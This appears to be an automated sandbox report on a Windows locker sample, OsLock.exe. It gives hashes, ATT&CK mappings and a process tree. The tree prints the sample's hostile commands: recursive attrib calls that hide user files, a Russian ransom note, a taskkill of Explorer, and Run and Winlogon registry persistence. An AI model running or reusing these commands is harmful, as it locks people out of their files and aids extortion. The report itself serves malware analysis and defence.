Analysis
max time kernel: 117s
max time network: 119s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 22-11-2024 09:15

Static task: static1

Behavioral task: behavioral1
  Sample: OsLock.exe
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: OsLock.exe
  Resource: win10v2004-20241007-en
General
Target: OsLock.exe
Size: 385KB
MD5: 675ea787630f596da0474830ffb49723
SHA1: c8e18cbc3cca1ded47eb5860a71b9f22d46409e1
SHA256: ad861f41bb4a31ee778bf60cecf0a7bdd9c0cc91d5cc17775d15199c214fbccf
SHA512: fa3c2c6edd3435bd16ec652c1738695cd1e8cdbd010b55fd856cefdbebd50552074d06e9b66860fae9c3a2f71ffe1076bb0227944b49286f05e1a3a4c871014d
SSDEEP: 6144:Z1IE/9oydPc4IvjTZlyZsDDyr3rAUp48zUCpM69/KImQi/6ebkY:Z1vlc4IrTZlyGDc54
Malware Config
Signatures
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\"" (process: OsLock.exe)

Drops startup file (1 IoC)
  File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (process: attrib.exe)

Adds Run key to start application (2 TTPs, 13 IoCs)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" -startup" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\System3264Wow = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" --init" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_1 = "AWindowsService.exe" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_2 = "taskhost.exe" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_4 = "System.exe" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSEdgeUpdateX = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\"" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\OneDrive10293 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" /setup" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WINDOWS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" --wininit" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_3 = "windowsx-c.exe" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_5 = "_default64.exe" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_6 = "native.exe" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_7 = "ux-cryptor.exe" (process: OsLock.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_8 = "crypt0rsx.exe" (process: OsLock.exe)
Drops desktop.ini file(s) (45 IoCs; desktop.ini files opened for modification by attrib.exe under the user profile, Public desktop and F:\$RECYCLE.BIN)
Hide Artifacts: Hidden Files and Directories (1 TTP, 6 IoCs)
  PIDs: 2732 cmd.exe, 2772 cmd.exe, 2776 cmd.exe, 2824 cmd.exe, 2828 cmd.exe, 2868 cmd.exe

Kills process with taskkill (1 IoC)
  PID: 2848 taskkill.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  PID: 1872 OsLock.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, PID 1872 OsLock.exe
  Token: SeDebugPrivilege, PID 2848 taskkill.exe

Suspicious use of WriteProcessMemory (57 IoCs; OsLock.exe PID 1872 wrote to the memory of each child cmd.exe and taskkill.exe, and each cmd.exe wrote to the memory of its child attrib.exe processes)
Views/modifies file attributes (1 TTP, 12 IoCs)
  PIDs: 2764 attrib.exe, 1632 attrib.exe, 2924 attrib.exe, 2800 attrib.exe, 2796 attrib.exe, 2636 attrib.exe, 2656 attrib.exe, 2688 attrib.exe, 2680 attrib.exe, 2624 attrib.exe, 2748 attrib.exe, 2852 attrib.exe
Processes

C:\Users\Admin\AppData\Local\Temp\OsLock.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\OsLock.exe"
  PID: 1872
  - Modifies WinLogon for persistence
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    Command line: cmd.exe /c F: & attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
    PID: 2732
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\attrib.exe
      Command line: attrib +h +s +r +i /D /S *
      PID: 2924
      - Drops desktop.ini file(s)
      - Views/modifies file attributes

    C:\Windows\system32\attrib.exe
      Command line: attrib -h +s +r info-lox.txt
      PID: 2680
      - Views/modifies file attributes

  C:\Windows\system32\cmd.exe
    Command line: cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
    PID: 2772
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\attrib.exe
      Command line: attrib +h +s +r +i /D /S *
      PID: 2796
      - Drops desktop.ini file(s)
      - Views/modifies file attributes

    C:\Windows\system32\attrib.exe
      Command line: attrib -h +s +r info-lox.txt
      PID: 2656
      - Views/modifies file attributes

  C:\Windows\system32\cmd.exe
    Command line: cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
    PID: 2776
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\attrib.exe
      Command line: attrib +h +s +r +i /D /S *
      PID: 2764
      - Drops desktop.ini file(s)
      - Views/modifies file attributes

    C:\Windows\system32\attrib.exe
      Command line: attrib -h +s +r info-lox.txt
      PID: 2636
      - Views/modifies file attributes

  C:\Windows\system32\cmd.exe
    Command line: cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
    PID: 2824
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\attrib.exe
      Command line: attrib +h +s +r +i /D /S *
      PID: 2800
      - Drops desktop.ini file(s)
      - Views/modifies file attributes

    C:\Windows\system32\attrib.exe
      Command line: attrib -h +s +r info-lox.txt
      PID: 2688
      - Views/modifies file attributes

  C:\Windows\system32\cmd.exe
    Command line: cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
    PID: 2828
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\attrib.exe
      Command line: attrib +h +s +r +i /D /S *
      PID: 2624
      - Drops desktop.ini file(s)
      - Views/modifies file attributes

    C:\Windows\system32\attrib.exe
      Command line: attrib -h +s +r info-lox.txt
      PID: 2748
      - Views/modifies file attributes

  C:\Windows\system32\cmd.exe
    Command line: cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
    PID: 2868
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\attrib.exe
      Command line: attrib +h +s +r +i /D /S *
      PID: 1632
      - Drops startup file
      - Drops desktop.ini file(s)
      - Views/modifies file attributes

    C:\Windows\system32\attrib.exe
      Command line: attrib -h +s +r info-lox.txt
      PID: 2852
      - Views/modifies file attributes

  C:\Windows\system32\taskkill.exe
    Command line: taskkill.exe /im Explorer.exe /f
    PID: 2848
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (2)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (1)

Privilege Escalation
  Boot or Logon Autostart Execution (2)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (1)
Downloads

Filesize: 6B
MD5: c2ddb87fcd81f868895dc5e4cce00702
SHA1: 90d6c9d00c574088776887f3863a849233856333
SHA256: c27e7902281a66630c499d0d7c1013f0cb17a7f5ea333ab35fde73d6e5d8ac36
SHA512: 3407ae2d3caa0928b1f3fb7b6e48856dfc6048f8f55eb2502abee0aa0196e373eb2cdc840a10b79f80edb79d5db021ed7f7ca93ca2aff4c016d0de1f2ef84b49

Filesize: 56B
MD5: 5250167e9ed5616c92f2c49b7e295375
SHA1: 6ca4f968809543f95a7c476bf39a9000231a4a4e
SHA256: 0a8ce0b30dffe9ca968d05f8067a017bc48e0f5a432d75b4b7d25d59ad58a40d
SHA512: df65c59ba2c3b5033b85c4a526957c0ecd508acb2222b95133fa574df7a77abd3007a682d56312357e3ace87b88bd386c5463884d2c28c184808cf7c0608aeec